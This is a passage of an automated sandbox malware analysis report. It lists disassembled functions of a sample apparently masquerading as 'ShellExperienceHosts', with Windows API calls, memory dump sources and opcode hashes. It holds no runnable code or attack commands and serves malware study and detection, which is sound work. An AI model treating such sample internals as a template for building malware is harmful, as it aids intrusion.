                                                                            Function 6C70AA6C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 196memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AA73
                                                                            • SysAllocString.OLEAUT32(PropertyList), ref: 6C70AABD
                                                                              • Part of subcall function 6C6B4DCE: FindResourceW.KERNEL32(?,?,00000006,00000000,?,?,?,?,6C6B201F,00000000,?,?), ref: 6C6B4DF4
                                                                              • Part of subcall function 6C6B4DCE: LoadResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E08
                                                                              • Part of subcall function 6C6B4DCE: LockResource.KERNEL32(00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E1A
                                                                              • Part of subcall function 6C6B4DCE: SizeofResource.KERNEL32(?,00000000,?,6C6B201F,00000000,?,?), ref: 6C6B4E28
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AB8E
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C70ABD6
                                                                            • __EH_prolog3.LIBCMT ref: 6C70AC0E
                                                                            • SysAllocString.OLEAUT32(PropertyList), ref: 6C70AC40
                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 6C70AC6D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocResourceString$H_prolog3$FindLoadLockSizeof
                                                                            • String ID: PropertyList
                                                                            • API String ID: 2705467776-1939653111
                                                                            • Opcode ID: 06c4718afd45446e43fd595b27f2207767ceb16ef14462fa8955e0f10151b654
                                                                            • Instruction ID: 2c71a1f9c62b1d7e2666ba514226b0dd2432a2a71f4fd80aeba1e58ed9be1063
                                                                            • Opcode Fuzzy Hash: 06c4718afd45446e43fd595b27f2207767ceb16ef14462fa8955e0f10151b654
                                                                            • Instruction Fuzzy Hash: A071D1B0B0020ADBDF10DF64CA48BEEB7F5BF04728F148529E9219BA80DB70D954CB95
                                                                            Function 6C7D6B02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 131windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7D6B09
                                                                            • GetObjectW.GDI32(00000004,00000018,?), ref: 6C7D6B20
                                                                              • Part of subcall function 6C7D6A5F: CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 6C7D6AD6
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7D6BA0
                                                                            • SelectObject.GDI32(?,00000004), ref: 6C7D6BB3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C7D6BD1
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6BE6
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C7D6C05
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6C13
                                                                            • SelectObject.GDI32(?,00000000), ref: 6C7D6C1D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$Create$Compatible$H_prolog3Section
                                                                            • String ID:
                                                                            • API String ID: 2431383920-3916222277
                                                                            • Opcode ID: c675f9baaaab34fd0f71d4c98df47ed40ed360cfb1c176ef0a0bd7756674ff64
                                                                            • Instruction ID: 600cc5b37f8569e414104fb210ffeea636b3dc316f17d3956c60cb2748e56e69
                                                                            • Opcode Fuzzy Hash: c675f9baaaab34fd0f71d4c98df47ed40ed360cfb1c176ef0a0bd7756674ff64
                                                                            • Instruction Fuzzy Hash: 2E41BF32D01119AFDB11CFE4DE48AEEBB75FF49308F118429E414A7690DB71AE09CBA0
                                                                            Function 022355C8 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$FreeVirtual
                                                                            • String ID: !jWW$.$_$i$l${vU_
                                                                            • API String ID: 974088968-3065862289
                                                                            • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                            • Instruction ID: e841c6b73f9d3711f5ee1507c293e790da8ac6c295b3382047dc3603370ad386
                                                                            • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                            • Instruction Fuzzy Hash: 94218DB4A403589FD721DF94CC84FAABBB9FF85700F0481CAE54CAA644D7B09A84CF52
                                                                            Function 6C6F28DE Relevance: 16.8, APIs: 11, Instructions: 299COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F2983
                                                                            • GetParent.USER32(?), ref: 6C6F298C
                                                                            • IsZoomed.USER32(?), ref: 6C6F29F7
                                                                            • SetWindowRgn.USER32 ref: 6C6F2A79
                                                                            • GetClientRect.USER32(?,?), ref: 6C6F2A9E
                                                                            • GetClientRect.USER32(?,?), ref: 6C6F2AB2
                                                                              • Part of subcall function 6C6E2D69: ClientToScreen.USER32(?,?), ref: 6C6E2D78
                                                                              • Part of subcall function 6C6E2D69: ClientToScreen.USER32(?,?), ref: 6C6E2D85
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6F2AD1
                                                                              • Part of subcall function 6C770C53: SetWindowPos.USER32(?,?,?,0000000A,0000000A,00000000,6C6B1806,?,?,6C6B1806,00000000,0000000A,0000000A,?,?,00000014), ref: 6C770C7B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectWindow$Screen$ParentZoomed
                                                                            • String ID:
                                                                            • API String ID: 2235899813-0
                                                                            • Opcode ID: bc7330d5cc18bc160fe44cf1dd5ec3b0215dc66ebf85fba9545c43742c3d26ae
                                                                            • Instruction ID: 18025109380166608b1430db0f557c3c88366081579b66c6c1f3b38ea9f57d8a
                                                                            • Opcode Fuzzy Hash: bc7330d5cc18bc160fe44cf1dd5ec3b0215dc66ebf85fba9545c43742c3d26ae
                                                                            • Instruction Fuzzy Hash: B2B14D71B0160AAFDF08DF64C958BFEB7B6BF49308F150128E915A7650DB30AD52CB98
                                                                            Function 031AA0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$swprintf$_malloc
                                                                            • String ID:
                                                                            • API String ID: 1873853019-0
                                                                            • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                            • Instruction ID: ef08b7d352c198112f69df0b33e4d19127cad8783f90109a3b2311d4d51b8846
                                                                            • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                            • Instruction Fuzzy Hash: C981D4B9940700BBE720EF58EC85F6B77A4AF4C311F1841A4ED195F382EB71E911C6A6
                                                                            Function 6C754A4B Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PtInRect.USER32(?,?,00000000), ref: 6C754A81
                                                                            • RedrawWindow.USER32(?,?,00000000,00000105,?,?,?,?,?,00000000), ref: 6C754AA4
                                                                            • ClientToScreen.USER32(?,?), ref: 6C754AD7
                                                                            • WindowFromPoint.USER32(?,?), ref: 6C754AE3
                                                                            • ReleaseCapture.USER32 ref: 6C754AFA
                                                                            • SetCapture.USER32(?), ref: 6C754B92
                                                                            • ReleaseCapture.USER32 ref: 6C754BC0
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C754BFD
                                                                            • UpdateWindow.USER32(?), ref: 6C754C06
                                                                            • ClientToScreen.USER32(?,?), ref: 6C754D28
                                                                            • SetCursorPos.USER32(?,?), ref: 6C754D34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureWindow$ClientRectReleaseScreen$CursorFromInvalidatePointRedrawUpdate
                                                                            • String ID:
                                                                            • API String ID: 1209641013-0
                                                                            • Opcode ID: b7ecf36b1ec04b8a61ae9c99b3a7066c6b73eaee2fcc9f1fe7caa1753d87f25d
                                                                            • Instruction ID: ff4f1056b8866467930c6b3943767396935c4f4ec2671b1d64439263c20b13b4
                                                                            • Opcode Fuzzy Hash: b7ecf36b1ec04b8a61ae9c99b3a7066c6b73eaee2fcc9f1fe7caa1753d87f25d
                                                                            • Instruction Fuzzy Hash: 83A15E71B00616AFDF09DF64C988BBDB7B5BF48318F140269E92693290DF30A961DBD1
                                                                            Function 6C70CB9F Relevance: 16.7, APIs: 11, Instructions: 245windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CaptureRectWindow$Visible$ClientEmptyH_prolog3_MessageReleaseScreenSend
                                                                            • String ID:
                                                                            • API String ID: 865670441-0
                                                                            • Opcode ID: a957a4430872df890fb18a1823f00562ed6deb6ec60a42573bdbfa46d13c3b54
                                                                            • Instruction ID: 6c09cdcd728ac82353f8c44cb933cb052c7ccb28a6b03a0d0b820c326ff825e6
                                                                            • Opcode Fuzzy Hash: a957a4430872df890fb18a1823f00562ed6deb6ec60a42573bdbfa46d13c3b54
                                                                            • Instruction Fuzzy Hash: 20A1AF71B00609EFCF09EFA4C944AEDBBF5FF48309F24412AE412AB650DB31A945CB91
                                                                            Function 10005A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,29759B20), ref: 10005A65
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005B04
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B42
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B67
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C5F
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 10005C80
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005B8C
                                                                              • Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
                                                                              • Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10005CF1
                                                                            • timeGetTime.WINMM ref: 10005CF7
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 10005D0B
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 10005D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                            • String ID:
                                                                            • API String ID: 1400036169-0
                                                                            • Opcode ID: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
                                                                            • Instruction ID: f393ff6f41c53dec0a4a663a217bd1082015950f507b03806f4406e75142b299
                                                                            • Opcode Fuzzy Hash: c8c359a865a91754db648c7caefba5610723c896864770a6932f917ef1d9d91d
                                                                            • Instruction Fuzzy Hash: 7AA1D7B0A01A56AFE354CF6AC8C479AFBE8FB08344F50862EE11DD7640D775A964CF90
                                                                            Function 02234C67 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 02234C9D
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02234CC4
                                                                            • SetLastError.KERNEL32(0000139F), ref: 02234CD8
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02234CDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 2124651672-0
                                                                            • Opcode ID: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                            • Instruction ID: b6a19b9ce8b07e10e7fb209bb02b9c53a9c06097de3b1cec22a9352bd4bc4490
                                                                            • Opcode Fuzzy Hash: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                            • Instruction Fuzzy Hash: EA519EB6A04605DFD711EFA8C984B6AF7F5FF48711F04856AE90A8B740E775E800CB91
                                                                            Function 10004C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F,29759B20,745947A0,?,?,00000001), ref: 10004CC6
                                                                            • EnterCriticalSection.KERNEL32(?,29759B20,745947A0,?,?,00000001), ref: 10004CED
                                                                            • SetLastError.KERNEL32(0000139F), ref: 10004D01
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10004D08
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 2124651672-0
                                                                            • Opcode ID: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
                                                                            • Instruction ID: f936773d66b76d96f3ecbf8df82172045f4aecfa059d2fdb31757c61ce649d4c
                                                                            • Opcode Fuzzy Hash: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
                                                                            • Instruction Fuzzy Hash: 5351BCB6A04601DFE311DFA8D985B6AB7F4FF48751F01462EE90A8B740DB36E8008B91
                                                                            Function 6C6EE9A5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 177timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6EE9AF
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000464), ref: 6C6EEA4B
                                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,?,?,00000464), ref: 6C6EEAA6
                                                                            • GetFileTime.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,?,00000464), ref: 6C6EEB56
                                                                            • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00000464), ref: 6C6EEB8D
                                                                            • GetFileSecurityW.ADVAPI32(?,00000004,00000000,00000000,?,?,?,?,00000464), ref: 6C6EEBA7
                                                                            • GetFileSecurityW.ADVAPI32(?,00000004,00000000,?,?,?,?,?,00000464), ref: 6C6EEBD0
                                                                            • SetFileSecurityW.ADVAPI32(?,00000004,00000000,?,?,?,00000464), ref: 6C6EEBE0
                                                                              • Part of subcall function 6C7BC0FD: PathStripToRootW.SHLWAPI(00000000,?,00000104,?,00000104,?,6C7BC6EA,?,?), ref: 6C7BC131
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: File$Security$PathTime$DiskFreeFullH_prolog3_NameRootSpaceStrip
                                                                            • String ID: MFC
                                                                            • API String ID: 3423035918-3472178984
                                                                            • Opcode ID: 81e1e886203599cd4ae597b87a43e84f630cecb8c94524e36650ac016f4f2af9
                                                                            • Instruction ID: a37737fff081aab31429beaa99449e715e3443f158834c7395b76462250aa1d9
                                                                            • Opcode Fuzzy Hash: 81e1e886203599cd4ae597b87a43e84f630cecb8c94524e36650ac016f4f2af9
                                                                            • Instruction Fuzzy Hash: FF6185B29051189BDF259F50CD84FEE777DAF49308F0041D6A619E6580EB30EE88CF69
                                                                            Function 031ABD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_wcsrchr
                                                                            • String ID: D
                                                                            • API String ID: 170005318-2746444292
                                                                            • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                            • Instruction ID: e2aeb643c3da6de2a54cd396b2fad5ffb9e0019fd854701af329e7b1b882c0de
                                                                            • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                            • Instruction Fuzzy Hash: 5C5104B994075C7BDB24EBA4CC85FEA7378AF5C701F404595E60DAA080EB709694CFA1
                                                                            Function 02234EE7 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(0000000D), ref: 02234F1A
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02234F2F
                                                                            • WSASetLastError.WS2_32(00002746), ref: 02234F41
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02234F48
                                                                            • timeGetTime.WINMM ref: 02234F76
                                                                            • timeGetTime.WINMM ref: 02234F9E
                                                                            • SetEvent.KERNEL32(?), ref: 02234FDC
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02234FE8
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02234FEF
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02235002
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 1979691958-0
                                                                            • Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                            • Instruction ID: 12a1791f281b6091c5355299a8e2ebfd395621755f417f05ee2972d31d8a3d28
                                                                            • Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                            • Instruction Fuzzy Hash: 0E41F9B1610301DFD722AFA8C988B6AB7F9FF4C315F188599E84ACB255D776E441CB80
                                                                            Function 10004F10 Relevance: 15.1, APIs: 10, Instructions: 114timenetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(0000000D), ref: 10004F43
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 10004F58
                                                                            • WSASetLastError.WS2_32(00002746), ref: 10004F6A
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10004F71
                                                                            • timeGetTime.WINMM ref: 10004F9F
                                                                            • timeGetTime.WINMM ref: 10004FC7
                                                                            • SetEvent.KERNEL32(?), ref: 10005005
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 10005011
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10005018
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 1000502B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 1979691958-0
